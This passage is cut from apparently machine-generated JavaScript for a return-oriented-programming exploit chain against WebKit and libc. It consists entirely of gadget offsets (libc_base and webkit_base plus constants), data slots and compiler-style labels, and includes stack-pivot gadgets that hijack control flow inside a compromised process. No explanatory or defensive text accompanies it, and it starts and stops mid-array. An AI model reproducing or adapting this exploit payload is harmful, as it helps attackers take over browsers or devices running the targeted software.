libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+124912, //L1539
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1539:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1541:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+125032, //L1544
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+125016, //L1542
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1542:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1544:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+125176, //L1547
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+125144, //L1545
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+125160, //L1546
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1545:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1546:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1547:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+125248, //L1549
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1549:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+125304, //L1550
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1550:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+125400, //L1553
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1552:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1553:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1554:
db([34, 0]); // 0x22
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+125496, //L1555
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+125512, //L1556
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1555:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1556:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+125600, //L1558
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1558:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+125656, //L1559
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1559:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+125728, //L1562
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1562:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+125784, //L1563
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1563:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L1565:
libc_base+782311, //pop rsp
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+125920, //L1566
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1566:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1568:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+126040, //L1571
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+126024, //L1569
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1569:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1571:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+126184, //L1574
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+126152, //L1572
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+126168, //L1573
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1572:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1573:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1574:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+126256, //L1576
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1576:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+126312, //L1577
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1577:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+126408, //L1580
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1579:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1580:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1581:
db([35, 0]); // 0x23
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+126504, //L1582
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+126520, //L1583
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1582:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1583:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+126608, //L1585
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1585:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+126664, //L1586
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1586:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+126736, //L1589
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1589:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+126792, //L1590
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1590:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+126880, //L1592
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1592:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1594:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+127000, //L1597
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+126984, //L1595
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1595:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1597:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+127144, //L1600
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+127112, //L1598
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+127128, //L1599
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1598:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1599:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1600:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+127224, //L1601
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1601:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1603:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+127344, //L1606
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+127328, //L1604
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1604:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1606:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+127488, //L1609
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+127456, //L1607
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+127472, //L1608
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1607:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1608:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1609:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+127560, //L1611
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1611:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+127616, //L1612
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1612:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+127712, //L1615
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1614:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1615:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1616:
db([36, 0]); // 0x24
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+127808, //L1617
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+127824, //L1618
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1617:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1618:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+127912, //L1620
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1620:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+127968, //L1621
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1621:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+128040, //L1624
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1624:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+128096, //L1625
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1625:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L1627:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+128232, //L1628
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1628:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1630:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+128352, //L1633
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+128336, //L1631
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1631:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1633:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+128496, //L1636
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+128464, //L1634
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+128480, //L1635
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1634:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1635:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1636:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+128568, //L1638
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1638:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+128624, //L1639
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1639:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+128720, //L1642
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1641:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1642:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1643:
db([37, 0]); // 0x25
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+128816, //L1644
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+128832, //L1645
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1644:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1645:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+128920, //L1647
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1647:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+128976, //L1648
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1648:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+129048, //L1651
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1651:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+129104, //L1652
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1652:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L1654:
libc_base+756185, //mov rsp, rbp ; pop rbp
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+129240, //L1655
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1655:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1657:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+129360, //L1660
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+129344, //L1658
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1658:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1660:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+129504, //L1663
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+129472, //L1661
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+129488, //L1662
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1661:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1662:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1663:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+129576, //L1665
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1665:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+129632, //L1666
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1666:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+129728, //L1669
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1668:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1669:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1670:
db([38, 0]); // 0x26
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+129824, //L1671
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+129840, //L1672
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1671:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1672:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+129928, //L1674
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1674:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+129984, //L1675
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1675:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+130056, //L1678
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1678:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+130112, //L1679
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1679:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+130240, //L1682
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+130224, //L1681
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1681:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1682:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+130344, //L1683
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+130360, //L1684
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L1683:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1684:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+130480, //L1685
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+130464, //L1686
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L1686:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L1685:
db([0, 0]); // 0x0
//___sputc:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+130552, //L1688
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L1688:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+130640, //L1689
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+130688, //L1692
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L1689:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1690:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1691:
db([0, 0]); // 0x0
set_gadget(webkit_base+568675,); //pop r8
//L1692:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+130784, //L1694
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
